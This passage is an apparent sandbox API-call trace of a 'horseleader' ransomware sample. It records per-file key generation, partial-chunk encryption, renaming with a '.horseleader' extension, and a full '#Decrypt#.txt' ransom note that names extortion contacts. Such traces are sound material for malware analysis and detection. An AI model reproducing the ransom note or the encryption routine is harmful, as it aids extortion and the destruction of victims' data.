nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0202.195] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0202.195] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0202.195] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0202.195] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0202.195] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0202.195] lstrlenW (lpString=".testttjffg") returned 11 [0202.195] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0202.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0202.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0202.196] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0202.196] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0202.197] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0202.197] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1988) returned 1 [0202.197] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x7c4, lpOverlapped=0x0) returned 1 [0202.713] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff83c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0202.713] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x7c4, lpOverlapped=0x0) returned 1 [0202.714] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0202.714] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0202.714] CloseHandle (hObject=0x21c) returned 1 [0202.714] GetProcessHeap () returned 0x780000 [0202.714] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0202.714] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0202.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0202.715] GetProcessHeap () 
returned 0x780000 [0202.715] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0202.715] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0202.715] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0202.715] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0202.715] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0202.723] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0202.723] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0202.724] lstrlenA (lpString="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") returned 1368 [0202.724] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0202.724] CloseHandle (hObject=0x1cc) returned 1 [0202.725] GetProcessHeap () returned 0x780000 [0202.725] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0202.725] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0202.725] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0202.725] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 66 [0202.725] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0202.725] lstrcmpW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0202.725] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0202.725] GetProcessHeap () returned 0x780000 [0202.725] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0202.725] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*") returned 68 [0202.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0204.371] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0204.371] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.") returned 68 [0204.371] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0204.371] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0204.371] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0204.371] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0204.371] lstrlenW (lpString=".testttjffg") returned 11 [0204.371] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0204.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0204.372] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.372] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0204.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0204.372] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..") returned 69 [0204.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0204.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0204.372] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0204.372] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0204.372] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0204.372] lstrlenW (lpString=".testttjffg") returned 11 [0204.373] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0204.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.373] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0204.373] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0204.373] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="Windows") returned -1 [0204.373] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0204.373] StrStrIW (lpFirst="ProjectMUI.msi", lpSrch=".horseleader") returned 0x0 [0204.373] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0204.374] lstrcmpW (lpString1="ProjectMUI.msi", lpString2="_uninstalling_.png") returned 1 [0204.374] lstrlenW (lpString=".testttjffg") returned 11 [0204.374] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpSrch=".testttjffg") returned 0x0 [0204.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 
[0204.374] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0204.377] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 81 [0204.378] StrStrW (lpFirst="ProjectMUI.msi", lpSrch=".txt") returned 0x0 [0204.378] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2511872) returned 1 [0204.378] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.378] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.625] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.625] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.626] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x130200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.626] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.633] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0204.633] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.634] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x260400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.634] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.921] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0204.921] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0204.921] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0204.922] CloseHandle (hObject=0x21c) returned 1 [0204.922] GetProcessHeap () returned 0x780000 [0204.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0204.922] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.horseleader") returned 93 [0204.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.horseleader")) returned 1 [0204.923] GetProcessHeap () returned 0x780000 [0204.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0204.923] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0204.923] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="Windows") returned -1 [0204.923] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0204.924] StrStrIW (lpFirst="ProjectMUI.xml", lpSrch=".horseleader") returned 0x0 [0204.924] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0204.924] lstrcmpW (lpString1="ProjectMUI.xml", lpString2="_uninstalling_.png") returned 1 [0204.924] lstrlenW (lpString=".testttjffg") returned 11 [0204.924] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpSrch=".testttjffg") 
returned 0x0 [0204.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0204.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0204.925] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0204.926] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0204.926] StrStrW (lpFirst="ProjectMUI.xml", lpSrch=".txt") returned 0x0 [0204.927] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1452) returned 1 [0204.927] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0205.289] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0205.290] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0205.290] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.290] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 
lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0205.291] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0205.291] CloseHandle (hObject=0x21c) returned 1 [0205.291] GetProcessHeap () returned 0x780000 [0205.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0205.455] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.horseleader") returned 93 [0205.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.horseleader")) returned 1 [0205.456] GetProcessHeap () returned 0x780000 [0205.456] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0205.456] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0205.456] lstrcmpiW (lpString1="ProjLR.cab", lpString2="Windows") returned -1 [0205.456] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, 
